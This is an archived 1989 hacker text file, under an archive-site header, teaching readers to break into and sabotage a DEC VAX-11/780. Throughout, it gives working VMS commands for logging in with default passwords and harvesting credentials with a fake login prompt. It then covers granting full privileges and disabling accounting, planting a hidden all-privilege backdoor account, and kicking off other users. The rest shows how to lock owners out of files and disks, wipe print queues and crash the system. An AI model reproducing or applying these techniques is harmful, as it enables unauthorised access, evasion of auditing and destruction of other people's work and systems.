home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacker Chronicles 1
/
HACKER1.ISO
/
chrontmp
/
vaxhack.arj
/
VAXHACK.TXT
Wrap
Text File
|
1989-05-20
|
9KB
|
196 lines
Hacking the
DEC VAX-11/780
For Phun and Profit
By.....
The
Nuclear
Wastoid
So, you say you want to learn how to hack the VAX-11/780. This
phile contains all you need to know to wreak massive havok and have
major fun. This phile is devided into five sections, which are:
1. Getting On 2. Staying On 3. Basics
4. Having Fun 5. Shutting Down and Getting Off.
Each is pretty much self- explanatory, so here goes:
PART I. Getting On.
There are 2 techniques to getting on the system: Hit and Miss, or
random passwords, and Cheating. We will, of course, deal with
cheating. To cheat yourself onto the system, you can either: 1. use
someone else's password, of 2. use a default password.
1. Using Someone Else's Password Using someone else's password can
be both good and bad. It's good because you don't have to create a
new account or use a restricted one, so the sysop won't see anything
out of the ordinary. It's bad because the person may notice that
someone else has been on the system with his pass when he wasn't on
the system. It's also not very good because the person may not have
high enough privelege for your needs. To get someone's password is
simple if you can get onto the system, even with limited access. Just
log onto the sysop's (or someone else with high enough privelege) and
write a program that just sits there and looks like the logon prompt.
Have the program output the names+ passes it gets to a remote printer
or a file that you can get to later, and then kill itself.
2. Defaults. There are four default accounts placed on the VAX
when it is first set up. These can be changed or deleted, but usually
one or two survive. The defaults are:
Name Password
---------------------------------------------------
SYSTEM MANAGER or OPERATOR
FIELD SERVICE or TEST
DEFAULT USER or DEFAULT
SYSTEST UETP or SYSTEST
I have found that FIELD SERVICE works most often.
Once you're on the system, you want to make yourself able to do the
most damage. to do his, type: $ SET PROC/PRIV=ALL -'$' is the system
prompt If the system responds with some bullshit about your privelege
not being high enough, GET ANOTHER PASSWORD. You need full access to
have enough phun.
PART II. Staying On.
Okay, you're on the system. Now what? Mass destruction, of course.
But first, make sure you'll be able to get back on. The first thing
you want to do is:è$ SET ACCOUNTING/DISABLE
This stops the system from keeping track of you. Now type:
$ SHOW USERS
to see who is on the system. If you see your account listed twice,
log off. You don't want to be caught because of something stupid like
that. If you want to make sure that nobody can interfere with your
phun, you should type:
$ SET LOGINS/INTERACTIVE=0
This keeps anybody else to log onto the computer. Now to kick
everybody else off:
$ SHOW USERS - the system responds with something like:
VAX/VMS INTERACTIVE USERS
23-JUL-1986 09:37:15.54
Total number of interactive users= 6
Username Process Name PID Terminal
BRUNO BRUNO 0000026B TTD3:
FIELD FIELD 00000FF2 TTC2:
JOHNSON _TTD5: 0000026D TTD5:
LINCOLN LINCOLN 0000026A TTD2:
CYBERPUNK CYBERPUNK 000001D8 TTD4:
HARDCORE HARDCORE 00000263 TTC0:
Now, if you logged on as FIELD, you want to go through and type:
$ STOP/ID=PID - substituting the number in the PID column for PID
for each person other than you. This kicks everybody else off the
system. It's best if you only do this at night or when usage is low,
because if the sysop gets lots of complaints he might catch you.
The next thing you want to do is make sure that you will be able to
get back onto the system next time. To do this, type:
$ SET DEF SYS$SYSROOT:[SYSEXE]
This takes you to the SYSEXE directory of the SYS$SYSROOT drive.
Now type:
$ RUN AUTHORIZE - the system will respond:
UAF> - now type:
UAF> ADD WASTOID /PASSWORD=ZEDNET /UIC=[099,900] /CPUTIME=0- <cr>
/DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING <cr>
UAF> EXIT <cr>
Now- what does this mean?
ADD WASTOID - adds new record with name=WASTOID
/PASSWORD=ZEDNET - sets password for new acount
/UIC=[099,900] - sets user identification code for new account
/CPUTIME=0 - tells system you can use it anytime
the '-' after /CPUTIME=0 tells the computer that you're starting a new line.
/DEVICE=SYS$SYSROOT - sets your home drive
/DIRECTORY=[SYSEXE] - sets your home directory
/PRIVS=ALL - give yourself full access
/NOACCOUNTING - so the system can't keep track of you
Okay. Now you'll be able to get back on. On to ...
PART III. System Basics
Here are some commands you need to know if you haven't ever used a
Vax:
è HELP - this brings up a list of all commands, and will explain any
of them for you.
SET DEF drive:[directory.sub1.sub2] - sets default drive and
directory.
TYPE or T - types a file to the screen. In the format : T
FILENAME.EXT
PRINT or PR - prints a file to the printer. In the format : PR
FILENAME.EXT
DIR or D - directory
D- shows name,size,protection
DIR/PRINT or D/PRINT outputs the directory to printer+ screen.
RUN or R - executes .EXE files R FILENAME.EXE
@ - executes .COM files @FILENAME.COM
Okay, now you're ready for:
PART IV: Having Fun.
A. Files
It has got to be the greatest feeling in the world to lock somebody out of
his own files. This is hilarious to do, especially if you can watch the
person when he finds out. To do this, you use the SET PROTECTION command.
Let's say that you want to lock everybody but yourself out of a file called
TEST.FIL. You would type:
$ SET PROT=(S:RWED,O,G,W) TEST.DAT
This gives you (the system) full rights, while everybody else (owner, group,
and world) has no access rights.
B. Disks
The next most fun thing to do is to lock everybody off of whole
disks at a time. To do this to drive DMA1:, you type:
$ DISMOUNT DMA1: - take DMA1: out of service
$ DEALLOCATE DMA1: - take DMA1: off line
$ SET PROT=(S,O:R,G,W)/DEVICE/OWNER_UIC[099,900] DMA1:
- this tells the system that DMA1: is a private drive of yours.
$ ALLOCATE DMA1: - bring DMA1: back on line
$ MOUNT DMA1: - put DMA1: back in service.
SHAZAM!! your own personal drive that nobody else can use.
C. Printers
Say you want to print a file called HACKING.DAT. You type :
$ PR HACKING.DAT
and the system responds that your file is 'pending' on LPA0:. this
means that some asshole just put a 1000 page file into the print
queue, so your little file won't print until next tuesday. What you
do is:
$ STOP/ABORT LPA0:
This makes the printer stop its current job and kick it off the
queue. Now:
$ DELETE/QUEUE LPA0:
This kills everything that was on the queue. Wow! A whole printer
to yourself!
Anyway, now I'll leave you alone. I'm sure you can find more ways
of having fun on your own, so I'll leave them to you. Oh, by the way-èdon't skip ....
PART V: Shutting Down and Getting Off
Now say that the system is going to explode in 30 seconds if it's
not shut down. Well, being the good samaritan that you are, you'll
just have to shut it down for them. There are two quick- and- dirty
ways that DEC provided for just such an occasion. #1 works, but #2 is
faster and looks nicer.
1. OPCCRASH.
To shut down the system with the OPCCRASH command, simply
$ RUN SYS$SYSTEM:OPCCRASH - the system will respond:
SYSTEM SHUTDOWN COMPLETE- USE CONSOLE TO HALT SYSTEM
now type:
^P - the system will respond:
>>> - type:
>>> HALT - the system will respond:
HALTED AT 8000708A - or whatever
2. CRASH system command
To shut down the systrem with the CRASH command, simply type:
^P
>>> HALT
>>> @CRASH - this executes the system command CRASH and displays a big error
listing. Neat, eh?
Now you can do everything, except log off, so here goes:
$ LO
WASTOID logged out at 23-JUL-1986 10:27:13.20
$